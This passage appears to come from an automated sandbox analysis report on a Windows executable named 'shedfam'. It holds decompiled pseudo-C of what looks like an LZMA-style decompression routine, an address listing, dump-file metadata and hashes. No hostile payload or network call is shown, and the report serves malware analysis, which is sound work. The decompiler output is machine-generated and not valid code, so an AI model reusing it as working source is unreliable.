											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00406768
0x00406768
0x00406768
0x00406768
0x0040676e
0x00406772
0x00406776
0x00406780
0x0040678e
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00406a9b
0x00406a9b
0x00406a9f
0x00000000
0x00000000
0x00406aa1
0x00406aaa
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406ac2
0x00406adb
0x00406ade
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af8
0x00406a98
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00000000
0x00000000
0x00000000
0x00406afa
0x00406afa
0x00406a73
0x00406a77
0x00406baf
0x00406baf
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a7d
0x00406a83
0x00406a8a
0x00406a92
0x00406a92
0x00406a95
0x00000000
0x00406a95
0x00406aff
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x004061c6
0x00000000
0x004061cd
0x004061d1
0x00000000
0x00000000
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406232
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00406b22
0x00000000
0x00406b22
0x0040627c
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062a6
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00406b31
0x00000000
0x00406b31
0x004062ec
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406ba3
0x00000000
0x00406ba3
0x004069fa
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x00000000
0x00000000
0x00406333
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d2
0x004065d6
0x004065f4
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f0
0x004066f4
0x004066fb
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x004066f6
0x00000000
0x00000000
0x00406717
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x00000000
0x00000000
0x00406969
0x00406969
0x0040696d
0x0040698f
0x0040698f
0x00406992
0x0040699c
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040696f
0x0040696f
0x00406972
0x00406976
0x00406979
0x00406979
0x0040697c
0x00000000
0x00000000
0x00406a26
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00406a5d
0x00406a5d
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00406a71
0x00406a2c
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00406980
0x00406980
0x00406983
0x00000000
0x00000000
0x00406b17
0x00406b17
0x00406b1a
0x00406a1b
0x00406a1b
0x00406a1b
0x00000000
0x00406a21
0x00000000
0x00406751
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00000000
0x00406a71
0x00000000
0x00000000
0x00000000
0x00406796
0x00406796
0x00406799
0x004067cf
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x0040682f
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00406b97
0x00000000
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x00406a9b
0x00406a64

Memory Dump Source

Source File: 00000000.00000002.257281468.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.257256064.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257318535.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257326105.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257337622.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257354953.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257362306.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257368418.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_shedfam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
Instruction ID: 0a364959098a1219693739684ad0890dad76377db1f96b1360ce1028e8ac0eba
Opcode Fuzzy Hash: 9f777e2b5f047ff5fac18a6b7d4eccb0398312e185884248bc8ff9efca1ede3f
Instruction Fuzzy Hash: 7EA15371E00229CBDF28DFA8C8447ADBBB1FB45305F11816ED816BB281C7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406969 Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406969() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
